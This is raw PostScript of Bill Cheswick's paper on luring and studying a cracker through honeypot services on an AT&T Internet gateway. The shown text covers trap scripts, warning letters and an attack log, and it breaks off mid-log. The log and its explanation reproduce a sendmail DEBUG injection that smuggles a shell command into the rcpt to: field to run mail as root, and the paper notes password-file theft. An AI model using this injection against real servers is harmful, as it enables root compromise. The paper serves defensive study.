%! %!PS-Adobe-2.0 %%Creator: dvips 5.490 Copyright 1986, 1992 Radical Eye Software %%Title: /tmp/lp32992.dvi %%Pages: 11 1 %%BoundingBox: 0 0 612 792 %%DocumentFonts: Times-Bold Times-Roman Times-Italic Courier %%EndComments %DVIPSCommandLine: dvips -r0 -c1 /tmp/lp32992.dvi %%BeginProcSet: tex.pro %! /TeXDict 250 dict def TeXDict begin /N{def}def /B{bind def}N /S{exch}N /X{S N} B /TR{translate}N /isls false N /vsize 11 72 mul N /@rigin{isls{[0 -1 1 0 0 0] concat}if 72 Resolution div 72 VResolution div neg scale isls{Resolution hsize -72 div mul 0 TR}if Resolution VResolution vsize -72 div 1 add mul TR matrix currentmatrix dup dup 4 get round 4 exch put dup dup 5 get round 5 exch put setmatrix}N /@landscape{/isls true N}B /@manualfeed{statusdict /manualfeed true put}B /@copies{/#copies X}B /FMat[1 0 0 -1 0 0]N /FBB[0 0 0 0]N /nn 0 N /IE 0 N /ctr 0 N /df-tail{/nn 8 dict N nn begin /FontType 3 N /FontMatrix fntrx N /FontBBox FBB N string /base X array /BitMaps X /BuildChar{ CharBuilder}N /Encoding IE N end dup{/foo setfont}2 array copy cvx N load 0 nn put /ctr 0 N[}B /df{/sf 1 N /fntrx FMat N df-tail}B /dfs{div /sf X /fntrx[sf 0 0 sf neg 0 0]N df-tail}B /E{pop nn dup definefont setfont}B /ch-width{ch-data dup length 5 sub get}B /ch-height{ch-data dup length 4 sub get}B /ch-xoff{128 ch-data dup length 3 sub get sub}B /ch-yoff{ch-data dup length 2 sub get 127 sub}B /ch-dx{ch-data dup length 1 sub get}B /ch-image{ch-data dup type /stringtype ne{ctr get /ctr ctr 1 add N}if}B /id 0 N /rw 0 N /rc 0 N /gp 0 N /cp 0 N /G 0 N /sf 0 N /CharBuilder{save 3 1 roll S dup /base get 2 index get S /BitMaps get S get /ch-data X pop /ctr 0 N ch-dx 0 ch-xoff ch-yoff ch-height sub ch-xoff ch-width add ch-yoff setcachedevice ch-width ch-height true[1 0 0 -1 -.1 ch-xoff sub ch-yoff .1 add]{ch-image}imagemask restore}B /D{/cc X dup type /stringtype ne{]}if nn /base get cc ctr put nn /BitMaps get S ctr S sf 1 ne{dup dup length 1 sub dup 2 index S get sf div put}if put /ctr ctr 1 add N} B /I{cc 1 add D}B /bop{userdict /bop-hook known{bop-hook}if /SI save N @rigin 0 0 moveto /V matrix currentmatrix dup 1 get dup mul exch 0 get dup mul add .99 lt{/FV}{/RV}ifelse load def pop}N /eop{SI restore showpage userdict /eop-hook known{eop-hook}if}N /@start{userdict /start-hook known{start-hook} if /VResolution X /Resolution X 1000 div /DVImag X /IE 256 array N 0 1 255{IE S 1 string dup 0 3 index put cvn put}for 65781.76 div /vsize X 65781.76 div /hsize X}N /p{show}N /RMat[1 0 0 -1 0 0]N /BDot 260 string N /rulex 0 N /ruley 0 N /v{/ruley X /rulex X V}B /V{}B /RV statusdict begin /product where{pop product dup length 7 ge{0 7 getinterval dup(Display)eq exch 0 4 getinterval (NeXT)eq or}{pop false}ifelse}{false}ifelse end{{gsave TR -.1 -.1 TR 1 1 scale rulex ruley false RMat{BDot}imagemask grestore}}{{gsave TR -.1 -.1 TR rulex ruley scale 1 1 false RMat{BDot}imagemask grestore}}ifelse B /FV{gsave transform round exch round exch itransform moveto rulex 0 rlineto 0 ruley neg rlineto rulex neg 0 rlineto fill grestore}B /a{moveto}B /delta 0 N /tail{dup /delta X 0 rmoveto}B /M{S p delta add tail}B /b{S p tail}B /c{-4 M}B /d{-3 M} B /e{-2 M}B /f{-1 M}B /g{0 M}B /h{1 M}B /i{2 M}B /j{3 M}B /k{4 M}B /w{0 rmoveto}B /l{p -4 w}B /m{p -3 w}B /n{p -2 w}B /o{p -1 w}B /q{p 1 w}B /r{p 2 w} B /s{p 3 w}B /t{p 4 w}B /x{0 S rmoveto}B /y{3 2 roll p a}B /bos{/SS save N}B /eos{SS restore}B end %%EndProcSet %%BeginProcSet: texps.pro %! TeXDict begin /rf{findfont dup length 1 add dict begin{1 index /FID ne 2 index /UniqueID ne and{def}{pop pop}ifelse}forall[1 index 0 6 -1 roll exec 0 exch 5 -1 roll VResolution Resolution div mul neg 0 0]/Metrics exch def dict begin Encoding{exch dup type /integertype ne{pop pop 1 sub dup 0 le{pop}{[}ifelse}{ FontMatrix 0 get div Metrics 0 get div def}ifelse}forall Metrics /Metrics currentdict end def[2 index currentdict end definefont 3 -1 roll makefont /setfont load]cvx def}def /ObliqueSlant{dup sin S cos div neg}B /SlantFont{4 index mul add}def /ExtendFont{3 -1 roll mul exch}def /ReEncodeFont{/Encoding exch def}def end %%EndProcSet %%BeginProcSet: special.pro %! TeXDict begin /SDict 200 dict N SDict begin /@SpecialDefaults{/hs 612 N /vs 792 N /ho 0 N /vo 0 N /hsc 1 N /vsc 1 N /ang 0 N /CLIP 0 N /rwiSeen false N /rhiSeen false N /letter{}N /note{}N /a4{}N /legal{}N}B /@scaleunit 100 N /@hscale{@scaleunit div /hsc X}B /@vscale{@scaleunit div /vsc X}B /@hsize{/hs X /CLIP 1 N}B /@vsize{/vs X /CLIP 1 N}B /@clip{/CLIP 2 N}B /@hoffset{/ho X}B /@voffset{/vo X}B /@angle{/ang X}B /@rwi{10 div /rwi X /rwiSeen true N}B /@rhi {10 div /rhi X /rhiSeen true N}B /@llx{/llx X}B /@lly{/lly X}B /@urx{/urx X}B /@ury{/ury X}B /magscale true def end /@MacSetUp{userdict /md known{userdict /md get type /dicttype eq{userdict begin md length 10 add md maxlength ge{/md md dup length 20 add dict copy def}if end md begin /letter{}N /note{}N /legal{ }N /od{txpose 1 0 mtx defaultmatrix dtransform S atan/pa X newpath clippath mark{transform{itransform moveto}}{transform{itransform lineto}}{6 -2 roll transform 6 -2 roll transform 6 -2 roll transform{itransform 6 2 roll itransform 6 2 roll itransform 6 2 roll curveto}}{{closepath}}pathforall newpath counttomark array astore /gc xdf pop ct 39 0 put 10 fz 0 fs 2 F/|______Courier fnt invertflag{PaintBlack}if}N /txpose{pxs pys scale ppr aload pop por{noflips{pop S neg S TR pop 1 -1 scale}if xflip yflip and{pop S neg S TR 180 rotate 1 -1 scale ppr 3 get ppr 1 get neg sub neg ppr 2 get ppr 0 get neg sub neg TR}if xflip yflip not and{pop S neg S TR pop 180 rotate ppr 3 get ppr 1 get neg sub neg 0 TR}if yflip xflip not and{ppr 1 get neg ppr 0 get neg TR}if}{noflips{TR pop pop 270 rotate 1 -1 scale}if xflip yflip and{TR pop pop 90 rotate 1 -1 scale ppr 3 get ppr 1 get neg sub neg ppr 2 get ppr 0 get neg sub neg TR}if xflip yflip not and{TR pop pop 90 rotate ppr 3 get ppr 1 get neg sub neg 0 TR}if yflip xflip not and{TR pop pop 270 rotate ppr 2 get ppr 0 get neg sub neg 0 S TR}if}ifelse scaleby96{ppr aload pop 4 -1 roll add 2 div 3 1 roll add 2 div 2 copy TR .96 dup scale neg S neg S TR}if}N /cp{pop pop showpage pm restore}N end}if}if}N /normalscale{Resolution 72 div VResolution 72 div neg scale magscale{DVImag dup scale}if 0 setgray}N /psfts{S 65781.76 div N}N /startTexFig{/psf$SavedState save N userdict maxlength dict begin /magscale false def normalscale currentpoint TR /psf$ury psfts /psf$urx psfts /psf$lly psfts /psf$llx psfts /psf$y psfts /psf$x psfts currentpoint /psf$cy X /psf$cx X /psf$sx psf$x psf$urx psf$llx sub div N /psf$sy psf$y psf$ury psf$lly sub div N psf$sx psf$sy scale psf$cx psf$sx div psf$llx sub psf$cy psf$sy div psf$ury sub TR /showpage{}N /erasepage{}N /copypage{}N /p 3 def @MacSetUp}N /doclip{psf$llx psf$lly psf$urx psf$ury currentpoint 6 2 roll newpath 4 copy 4 2 roll moveto 6 -1 roll S lineto S lineto S lineto closepath clip newpath moveto}N /endTexFig{end psf$SavedState restore}N /@beginspecial{ SDict begin /SpecialSave save N gsave normalscale currentpoint TR @SpecialDefaults count /ocount X /dcount countdictstack N}N /@setspecial{CLIP 1 eq{newpath 0 0 moveto hs 0 rlineto 0 vs rlineto hs neg 0 rlineto closepath clip}if ho vo TR hsc vsc scale ang rotate rwiSeen{rwi urx llx sub div rhiSeen{ rhi ury lly sub div}{dup}ifelse scale llx neg lly neg TR}{rhiSeen{rhi ury lly sub div dup scale llx neg lly neg TR}if}ifelse CLIP 2 eq{newpath llx lly moveto urx lly lineto urx ury lineto llx ury lineto closepath clip}if /showpage{}N /erasepage{}N /copypage{}N newpath}N /@endspecial{count ocount sub{pop}repeat countdictstack dcount sub{end}repeat grestore SpecialSave restore end}N /@defspecial{SDict begin}N /@fedspecial{end}B /li{lineto}B /rl{ rlineto}B /rc{rcurveto}B /np{/SaveX currentpoint /SaveY X N 1 setlinecap newpath}N /st{stroke SaveX SaveY moveto}N /fil{fill SaveX SaveY moveto}N /ellipse{/endangle X /startangle X /yrad X /xrad X /savematrix matrix currentmatrix N TR xrad yrad scale 0 0 1 startangle endangle arc savematrix setmatrix}N end %%EndProcSet TeXDict begin 40258431 52099146 1000 300 300 @start /Fa 165[20 4[24 20 18 22 2[24 24 30 20 5[18 20 24 1[22 24 65[{}14 33.333332 /Times-Roman rf /Fb 60[22 70[22 1[22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 2[22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 1[22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 1[22 22 22 22 33[{}88 37.500000 /Courier rf /Fc 134[25 1[25 25 25 25 25 25 25 25 25 25 25 25 2[25 25 25 25 25 25 25 25 25 14[25 2[25 2[25 25 5[25 1[25 1[25 6[25 4[25 2[25 1[25 25 25 9[25 36[{}36 41.666668 /Courier rf /Fd 1 16 df<03C00FF01FF83FFC7FFE7FFEFFFFFFFFFFFFFFFF7FFE7FFE3FFC1F F80FF003C010107E9115>15 D E /Fe 47[37 33[21 51[16 18 1[28 18 21 12 16 16 1[21 21 21 30 12 18 1[12 21 21 12 18 21 18 21 21 9[35 1[30 23 21 25 1[25 2[35 3[14 1[30 25 25 30 28 25 25 6[14 10[12 10 14 10 2[14 14 14 5[14 33[{}49 41.666668 /Times-Italic rf /Ff 47[42 21[18 10[23 23 3[18 47[18 21 21 30 21 21 12 16 14 21 21 21 21 32 12 21 12 12 21 21 14 18 21 18 21 18 14 2[14 1[14 1[30 30 39 30 30 25 23 28 30 23 30 30 37 25 30 16 14 30 30 23 25 30 28 28 30 1[18 4[12 21 21 21 21 21 21 21 21 21 21 12 10 14 10 2[14 14 14 32 4[14 33[{}80 41.666668 /Times-Roman rf /Fg 134[21 1[30 21 23 14 16 18 2[21 23 35 12 23 1[12 23 21 14 18 23 18 23 21 9[42 1[30 28 1[30 2[32 4[21 16 32 1[25 28 30 30 28 30 6[14 21 21 21 21 21 21 21 21 21 21 1[10 12[14 33[{}48 41.666668 /Times-Bold rf /Fh 136[36 2[17 19 22 2[25 2[14 28 1[14 28 2[22 1[22 28 25 12[33 7[33 8[36 33 36 26[41 38[{}19 50.000000 /Times-Bold rf /Fi 136[42 29 32 19 23 26 3[32 2[32 1[16 32 29 19 26 32 26 1[29 9[58 3[32 6[39 2[23 3[39 1[42 39 42 20[15 44[{}25 58.333336 /Times-Bold rf end %%EndProlog %%BeginSetup %%Feature: *Resolution 300dpi TeXDict begin %%EndSetup %%Page: 1 1 0 bop 663 169 a Fi(An)14 b(Evening)h(with)h(Berferd)327 243 y(In)e(Which)i(a)e(Cracker)g(is)h(Lur)o(ed,)f(Endur)o(ed,)g(and)h(Studied)829 367 y Fh(Bill)d(Cheswick)713 467 y(A)l(T&T)h(Bell)g(Laboratories)898 659 y Fg(Abstract)0 751 y Ff(On)d(7)h(January)f(1991)g(a)h(cracker)n(,)i (believing)c(he)i(had)f(discovered)h(the)f(famous)h(sendmail)f(DEBUG)h(hole)f (in)g(our)g(Internet)g(gateway)0 801 y(machine,)h(attempted)f(to)g(obtain)f (a)i(copy)f(of)g(our)g(password)g(\256le.)15 b(I)c(sent)f(him)g(one.)0 869 y(For)h(several)i(months)d(we)i(led)g(this)f(cracker)h(on)f(a)i(merry)e (chase)i(in)e(order)g(to)g(trace)i(his)e(location)f(and)i(learn)f(his)g (techniques.)19 b(This)0 919 y(paper)12 b(is)f(a)h(chronicle)f(of)h(the)f (cracker)r(')n(s)h(\252successes\272)j(and)c(disappointments,)g(the)g(bait)g (and)g(traps)h(used)g(to)e(lure)i(and)f(detect)h(him,)0 969 y(and)e(the)g(chroot)g(\252Jail\272)h(we)g(built)d(to)i(watch)g(his)g (activities.)0 1036 y(W)m(e)15 b(concluded)g(that)f(our)g(cracker)i(had)f(a)g (lot)f(of)h(time)f(and)h(persistence,)i(and)e(a)g(good)f(list)g(of)g (security)h(holes)f(to)g(use)i(once)f(he)0 1086 y(obtained)10 b(a)h(login)f(on)g(a)i(machine.)18 b(W)n(ith)10 b(these)i(holes)e(he)h(could) g(often)f(subvert)g(the)h Fe(uucp)g Ff(and)g Fe(bin)f Ff(accounts)h(in)f (short)h(order)n(,)g(and)0 1136 y(then)f Fe(r)n(oot)p Ff(.)15 b(Our)10 b(cracker)i(was)f(interested)e(in)h(military)f(tar)o(gets)h(and)h (new)f(machines)h(to)f(help)g(launder)g(his)f(connections.)0 1318 y Fg(1.)21 b(Intr)o(oduction)83 1414 y Ff(Our)8 b(secure)h(Internet)e (gateway)h(was)h(\256rmly)e(in)h(place)g(by)g(the)f(spring)g(of)h(1990[1)n (].)15 b(W)n(ith)7 b(the)h(castle)h(gate)f(in)f(place,)i(I)f(wondered)0 1463 y(how)k(often)f(the)h(lock)g(was)g(tried.)20 b(I)12 b(knew)g(there)g (were)h(barbarians)f(out)f(there.)21 b(Who)12 b(were)g(they?)20 b(Where)13 b(did)e(they)h(attack)g(from)0 1513 y(and)e(how)g(often?)15 b(What)10 b(security)g(holes)g(did)f(they)h(try?)k(They)d(weren')o(t)f(doing) f(any)h(damage)i(to)d(A)-5 b(T&T)m(,)12 b(merely)f(\256ddling)d(with)h(the)0 1563 y(door)n(.)15 b(The)c(ultimate)f(fun)g(would)g(be)h(to)f(lure)g(a)h (cracker)h(into)d(a)i(situation)e(where)i(we)g(log)f(his)g(sessions,)h(learn) g(a)g(thing)e(or)i(two,)f(and)0 1613 y(warn)g(his)g(subsequent)g(tar)o(gets.) 0 1681 y(The)f(owner)g(of)f(an)h(average)h(workstation)d(on)h(the)h(Internet) f(has)h(few)g(tools)e(for)h(answering)h(these)g(questions.)14 b(Commercial)9 b(systems)0 1730 y(detect)k(and)g(report)f(some)i(probes,)f (but)f(ignore)g(many)h(others.)23 b(Our)12 b(gateway)h(was)h(producing)d(10)h (megabytes)i(of)e(detailed)h(logs)0 1780 y(each)e(day)g(for)f(the)g(standard) g(services.)16 b(How)10 b(often)f(were)j(people)e(trying)e(to)i(use)g(the)h (services)g(we)f(did)g(not)f(support?)0 1848 y(W)m(e)14 b(added)g(a)g(few)g (fake)h(services,)g(and)f(I)g(wrote)f(a)i(script)e(to)g(scan)h(the)g(logs)f (daily)m(.)25 b(This)14 b(list)e(of)i(services)g(and)g(other)f(lures)h(has)0 1898 y(grown\320we)9 b(now)h(check)h(the)f(following:)42 1999 y Fd(\017)20 b Fe(FTP:)13 b Ff(The)g(scanner)f(produces)g(a)h(report)e(of)h (all)g(login)e(names)j(that)f(were)h(attempted.)20 b(It)12 b(also)g(reports)f(the)h(use)g(of)g(a)h(tilde)e(\(a)83 2048 y(possible)h(probe)h(of)g(an)g(old)f(FTP)i(bug\),)f(all)g(attempts)g(to)f (obtain)g(FTP')n(s)h Fc(/etc/passwd)f Ff(and)h Fc(/etc/group)g Ff(\256les,)h(and)83 2098 y(a)f(list)e(of)h(all)f(\256les)i(stored)f(in)f (the)h Fc(pub)g Ff(directory)m(.)20 b(People)13 b(who)e(obtain)g(the)h Fc(passwd)g Ff(\256le)h(are)g(often)e(looking)f(for)i(account)83 2148 y(names)g(to)e(try)m(,)h(and)g(password)g(entries)g(to)f(crack.)18 b(Sometimes)12 b(system)f(administrators)f(put)g(their)g(real)h(password)g (\256le)g(in)f(the)83 2198 y(FTP)h(directory)m(.)j(W)m(e)d(have)g(a)g(bogus)e (\256le)i(whose)f(passwords,)h(when)f(cracked,)i(are)f Fe(why)31 b(ar)n(e)h(you)f(wasting)e(your)j(time.)42 2281 y Fd(\017)20 b Fe(T)l(elnet/login:)c Ff(All)10 b(login)h(attempts)g(are)h(logged)f(and)h (reviewed)g(daily)m(.)19 b(It)11 b(is)h(easy)g(to)f(spot)g(when)h(someone)g (is)g(trying)e(many)83 2331 y(accounts,)h(or)f(hammering)h(on)e(a)i (particular)f(account.)15 b(Since)c(there)f(are)h(no)f(authorized)g(accounts) h(for)f(Internet)f(users)i(on)f(our)83 2381 y(gateway)h(other)e(than)h Fc(guard)p Ff(,)h(it)e(is)h(easy)h(to)f(pick)g(out)f(probes.)42 2464 y Fd(\017)20 b Fe(Guest/visitor)9 b(accounts:)16 b Ff(A)11 b(public)e(computer)i(account)g(is)g(the)f(\256rst)h(thing)e(a)i(cracker)h (looks)e(for)n(.)16 b(These)c(accounts)f(provide)83 2513 y(friendly)m(,)g (easy)h(access)i(to)c(nearly)h(every)h(\256le)g(in)e(the)h(machine,)i (including)c(the)j(password)f(\256le.)18 b(The)12 b(cracker)h(can)f(also)f (get)h(a)83 2563 y(list)e(of)g(hosts)h(trusted)e(by)i(this)f(machine)h(from)g (the)g Fc(/etc/hosts.equiv)e Ff(and)i(various)f(personal)h Fc(.rhosts)f Ff(\256les.)17 b(Our)83 2613 y(login)9 b(script)g(for)h(these)h (accounts)f(look)g(something)f(like)h(this:)p eop %%Page: 2 2 1 bop 150 42 a Fb(exec)24 b(2>/dev/nu)q(ll)i(#)d(ensure)i(that)f(stderr)h (doesn't)g(appear)150 81 y(trap)f("")f(1)150 120 y(/bin/echo)150 160 y(\()90 b(/bin/echo)26 b("Attempt)g(to)d(login)i(to)e(inet)h(with)47 b($LOGNAME)h(from)e($CALLER")26 b(|)441 199 y(upasname)q(=a)q(dm)g(/bin/mail) g(ches)e(dangelo)h(&)262 239 y(#)e(\(notify)i(calling)h(machine's)g (administra)q(to)q(r)g(for)d(some)h(machines)q(...)q(\))262 278 y(#)f(\(finger)i(the)f(calling)h(machine.)q(..\))150 318 y(\))e(2>&1)h(|)f(mail)h(ches)g(dangelo)150 396 y(/bin/echo)i("/tmp)f(full") 150 436 y(sleep)f(5)382 b(#)23 b(I)g(love)h(to)f(make)h(them)g(wait....)150 475 y(/bin/echo)i("/tmp)f(full")150 515 y(/bin/echo)h("/tmp)f(full")150 554 y(/bin/echo)150 594 y(sleep)f(60)360 b(#)23 b(...)g(and)h(simulatin)q(g)i (a)d(busy)h(machine)h(is)e(useful)83 702 y Ff(W)m(e)10 b(have)h(to)e(be)h (careful)h(that)e(the)h(caller)g(doesn')o(t)g(see)h(our)e(error)h(messages)i (if)d(we)h(make)h(a)g(mistake)f(in)f(this)g(script.)15 b(Note)10 b(that)83 751 y Fc($CALLER)i Ff(is)g(the)g(name)i(or)e(IP)g(number)g(of)g (the)g(machine)i(on)e(the)g(other)g(end.)21 b(It)12 b(is)g(available)g(to)g (the)g(user)r(')n(s)g(environment)83 801 y(through)d(modi\256cations)g(to)h (our)f Fe(telnetd)h Ff(and)g Fe(login)f Ff(programs.)42 884 y Fd(\017)20 b Fe(SMTP)11 b(DEBUG:)g Ff(This)f(command)i(used)f(to)f(provide) f(a)i(couple)g(of)f(trap)g(doors)g(into)g Fe(sendmail)p Ff(.)15 b(All)10 b(the)g(vendors)g(seemed)j(to)83 934 y(clean)d(up)e(this)g(famous)h (hole)g(quite)f(a)h(while)g(ago,)g(but)f(some)i(crackers)g(still)e(try)g(it)g (occasionally)m(.)15 b(The)9 b(hole)g(allowed)f(outsiders)83 984 y(to)k(execute)i(a)f(shell)f(script)g(as)i Fc(root)p Ff(.)22 b(When)13 b(someone)g(tries)g(this)e(on)i(our)f(machine,)i(I)f(receive)h(the) e(text)g(that)g(the)h(cracker)83 1034 y(wishes)d(to)g(have)h(executed.)42 1117 y Fd(\017)20 b Fe(Finger:)15 b(Finger)10 b Ff(provides)f(a)i(lot)e(of)h (information)e(useful)i(to)f(crackers:)16 b(account)11 b(names,)g(when)f(the) g(account)h(was)g(last)f(used,)83 1166 y(and)f(a)h(few)f(things)f(to)g(try)g (as)i(passwords.)15 b(Since)9 b(our)g(corporate)g(policy)f(does)h(not)f (allow)g(us)h(to)g(provide)f(this)g(information,)g(we)83 1216 y(put)i(in)h(a)h(service)g(that)e(rejects)i(the)f(call)g(after)h(\256ngering) e(the)h(caller)n(.)18 b(\(Obviously)9 b(we)j(had)f(to)g(take)h(steps)f(to)g (avoid)f(\256ngering)83 1266 y(loops)f(if)f(the)i(\256nger)f(came)i(from)e (our)g(gateway)m(.\))16 b(It)9 b(turns)f(out)h(that)g(we)h(receive)g(about)f (a)h(dozen)f(\256nger)h(requests)f(per)h(day)m(,)g(and)83 1316 y(they)i(are)h(mostly)e(legitimate.)21 b(W)m(e)12 b(now)g(print)f(useful)h (information)e(for)i(general)h(queries,)g(but)e(mail)h(an)h(alarm)g(if)e (someone)83 1366 y(wants)f(speci\256c)h(information)e(about)g(bogus)h (accounts.)42 1449 y Fd(\017)20 b Fe(Rlogin/rsh:)12 b Ff(These)f(commands)f (rely)e(on)h(a)g(notoriously)d(insecure)k(authentication)d(system,)j(which)e (we)i(do)e(not)h(support.)k(But)83 1499 y(we)h(do)f(mail)h(reports)f(of)g (attempts)g(to)g(use)h(them)g(along)f(with)f(reverse)j(\256nger)e (information)f(and)i(particulars)f(like)f(the)i(user)83 1548 y(name)d(and)g(desired)f(command.)0 1649 y(Many)h(of)g(these)h(detectors)f (perform)h(a)f(\252reverse)i Fe(\256nger)p Ff(\272)f(to)f(the)g(calling)f (machine.)19 b(These)13 b Fe(\256nger)p Ff(s)e(can)i(often)d(locate)i(the)f (calling)0 1699 y(user)g(on)e(a)i(busy)f(machine)h(after)f(several)h(probes,) g(and)f(even)h(identify)d(the)j(previous)e(hop)h(on)f(a)i(laundered)f(call.)0 1767 y(When)h(a)f(probe)g(appears)h(to)f(have)h(no)f(legitimate)f(purpose,)h (I)g(send)h(a)g(message)h(like)d(the)i(following:)150 1857 y Fb(inetfans)26 b(postmaster)q(@s)q(ds)q(u.e)q(du)150 1936 y(Yesterday)g(someone)f(from)g(math.sdsu.)q(ed)q(u)g(fetched)h(the)d (/etc/pas)q(sw)q(d)i(file)150 1976 y(from)f(our)g(FTP)f(director)q(y.)48 b(The)24 b(file)g(is)f(not)h(important)q(,)i(but)d(these)i(probes)150 2015 y(are)f(sometimes)i(performed)g(from)e(stolen)h(accounts.)150 2094 y(Just)f(thought)h(you'd)g(like)f(to)f(know.)150 2173 y(Bill)h(Cheswick)0 2274 y Ff(This)11 b(is)h(a)g(typical)f(letter)n(.)18 b(It)11 b(is)g(sent)h(to)f(`inetfans')g(which)g(consists)g(of)g(the)g (Computer)g(Emer)o(gency)i(Response)f(T)m(eam)h(\(CER)n(T\),)f(a)0 2323 y(log,)e(and)g(some)h(interested)f(parties,)g(plus)g(someone)h(who)f(is) g(likely)f(to)g(care)j(at)e(the)g(of)o(fending)f(site.)0 2391 y(Many)h(system)h(administrators)e(take)i(these)g(reports)f(quite)g (seriously)m(,)g(especially)g(the)h(military)e(sites.)16 b(Generally)m(,)10 b(system)h(admin-)0 2441 y(istrators)g(are)i(quite)e(cooperative)g(in)h (hunting)e(down)h(these)i(problems.)20 b(Responses)12 b(to)f(these)i(letters) e(included)g(apologies)h(\(some)0 2491 y(lengthy\),)7 b(bounced)h(messages,)j (closed)d(accounts,)h(several)g(tighter)e(routers,)h(and)g(silence.)15 b(When)8 b(a)h(site)f(seems)i(willing)5 b(to)j(sponsor)0 2541 y(repeated)j(cracker)g(activity)e(we)i(consider)f(refusing)g(all)f(packets)i (from)f(them.)p eop %%Page: 3 3 2 bop 0 42 a Fg(2.)21 b(Unfriendly)10 b(Acts)83 137 y Ff(W)m(e've)k(been)g (running)d(this)i(setup)g(since)h(July)f(1990.)24 b(Probe)13 b(rates)h(go)f(up)g(during)f(college)h(vacations.)25 b(Our)13 b(rate)h(may)g(be)0 187 y(higher)9 b(than)h(most,)h(because)h(we)e(are)h (well-known)e(and)h(considered)h(by)e(some)i(to)f(be)h(\252The)g(Phone)f (Company)m(.\272)0 255 y(When)d(a)h(caller)g(fetches)g(the)f Fc(passwd)f Ff(\256le)i(during)e(a)h(long)f(session,)j(it)d(is)h(not)f (always)i(clear)g(that)f(he)g(has)h(evil)e(intentions.)12 b(Sometimes)0 304 y(they)e(are)h(just)e(checking)i(to)e(see)j(if)d(any)i(transfer)f(will)f (work.)0 372 y(The)i(following)d(log,)i(from)g(15)g(Jan)g(1991,)g(shows)g (decidedly)g(unfriendly)e(activity:)150 463 y Fb(19:43:10)26 b(smtpd[2746)q(6])q(:)g(<---)e(220)f(inet.att)q(.co)q(m)j(SMTP)150 502 y(19:43:14)g(smtpd[2746)q(6])q(:)g(------->)f(debug)150 541 y(19:43:14)h(smtpd[2746)q(6])q(:)g(DEBUG)e(attempt)150 581 y(19:43:14)i(smtpd[2746)q(6])q(:)g(<---)e(200)f(OK)150 620 y(19:43:25)j(smtpd[2746)q(6])q(:)g(------->)f(mail)f(from:)150 660 y(19:43:25)i(smtpd[2746)q(6])q(:)g(<---)e(503)f(Expectin)q (g)i(HELO)150 699 y(19:43:34)h(smtpd[2746)q(6])q(:)g(------->)f(helo)150 739 y(19:43:34)h(smtpd[2746)q(6])q(:)g(HELO)e(from)150 778 y(19:43:34)i(smtpd[2746)q(6])q(:)g(<---)e(250)f(inet.att)q(.co)q(m)150 818 y(19:43:42)j(smtpd[2746)q(6])q(:)g(------->)f(mail)f(from:)h()150 857 y(19:43:42)h(smtpd[2746)q(6])q(:)g(<---)e(250)f(OK)150 896 y(19:43:59)j(smtpd[2746)q(6])q(:)g(------->)f(rcpt)f(to:)f(rcpt)f(to:<|sed)i(-e)d ('1,/\303$/')q(d)j(|)c(/bin/sh)k(;)d(exit)h(0">)150 1015 y(19:44:44)i (smtpd[2746)q(6])q(:)g(shell)e(character)q(s:)i(|sed)e(-e)f('1,/\303$/')q(d)j (|)c(/bin/sh)k(;)d(exit)h(0")150 1054 y(19:44:45)i(smtpd[2746)q(6])q(:)g (<---)e(250)f(OK)150 1094 y(19:44:48)j(smtpd[2746)q(6])q(:)g(------->)f(data) 150 1133 y(19:44:48)h(smtpd[2746)q(6])q(:)g(<---)e(354)f(Start)i(mail)f (input;)h(end)e(with)i(.)150 1172 y(19:45:04)h(smtpd[2746)q (6])q(:)g(<---)e(250)f(OK)150 1212 y(19:45:04)j(smtpd[2746)q(6])q(:)g (/dev/null)48 b(sent)24 b(48)f(bytes)i(to)46 b(upas.secur)q(it)q(y)150 1251 y(19:45:08)26 b(smtpd[2746)q(6])q(:)g(------->)f(quit)150 1291 y(19:45:08)h(smtpd[2746)q(6])q(:)g(<---)e(221)f(inet.att)q(.co)q(m)j (Terminatin)q(g)150 1330 y(19:45:08)g(smtpd[2746)q(6])q(:)g(finished.)0 1431 y Ff(This)11 b(is)g(our)f(log)h(of)f(an)i(SMTP)f(session.)18 b(These)12 b(arcane)h(sessions)e(are)h(usually)e(carried)h(out)f(between)i (two)e(mailers.)18 b(In)11 b(this)f(case,)0 1481 y(there)h(was)g(a)g(human)f (at)h(the)f(other)g(end)g(typing)f(\(and)h(mistyping\))f(commands)i(to)f(our) g(mail)g(demon.)16 b(The)11 b(\256rst)f(thing)f(he)i(tried)e(was)0 1531 y(the)i Fc(debug)f Ff(command.)19 b(He)11 b(must)g(have)h(been)f (surprised)f(when)h(he)h(got)e(the)h(\252)p Fc(250)25 b(OK)p Ff(\272)11 b(response.)18 b(The)11 b(key)g(line)g(is)g(the)f Fc(rcpt)0 1581 y(to:)17 b Ff(command)c(entered)e(at)h(19:44:44.)17 b(The)12 b(text)f(within)f(the)h(angled)h(brackets)g(of)f(this)f(command)j (is)e(usually)g(the)g(address)h(of)g(a)0 1630 y(mail)f(recipient.)17 b(Here)12 b(it)e(contains)h(a)g(command)h(line.)18 b Fe(Sendmail)9 b Ff(used)j(to)e(execute)i(this)e(command)i(line)f(as)g(root)g(when)g(it)f (was)i(in)0 1680 y(debug)e(mode.)15 b(The)c(text)f(of)g(the)g(actual)h(mail)f (message)i(\(not)d(logged\))g(is)h(piped)g(through)150 1771 y Fb(sed)24 b(-e)f('1,/\303$/'d)j(|)d(/bin/sh)i(;)e(exit)h(0")0 1872 y Ff(which)10 b(strips)g(of)o(f)h(the)f(mail)h(headers)h(and)f(executes) h(the)e(rest)h(of)g(the)f(message)j(as)e(root.)16 b(The)11 b(text)g(of)f(the)h(message)h(was)g(mailed)f(to)0 1921 y(me.)16 b(Here)11 b(were)g(two)f(of)g(these)g(probes)g(as)h(I)g(logged)e(them,)i (including)d(a)j(time)f(stamp:)150 2012 y Fb(19:45)92 b(mail)24 b(adrian@em)q(bez)q(zl)q(e.s)q(ta)q(nf)q(ord)q(.e)q(du)i(From)e(root@res)q (ea)q(rch)q(.a)q(tt)q(.co)q(m)i(Tue)d(Jan)h(15)f(18:49:13)j(1991)150 522 y(Received:)g(from)e(research)q(.at)q(t.)q(com)i(by)e(embezzle.S)q(ta)q (nfo)q(rd)q(.ED)q(U)i(\(5.61/4.7\))q(;)150 561 y(Tue,)e(15)f(Jan)h(91)f (18:49:12)j(-0800)150 601 y(Message-I)q(d:)g(<91011602)q(49)q(.AA)q(26)q(092) 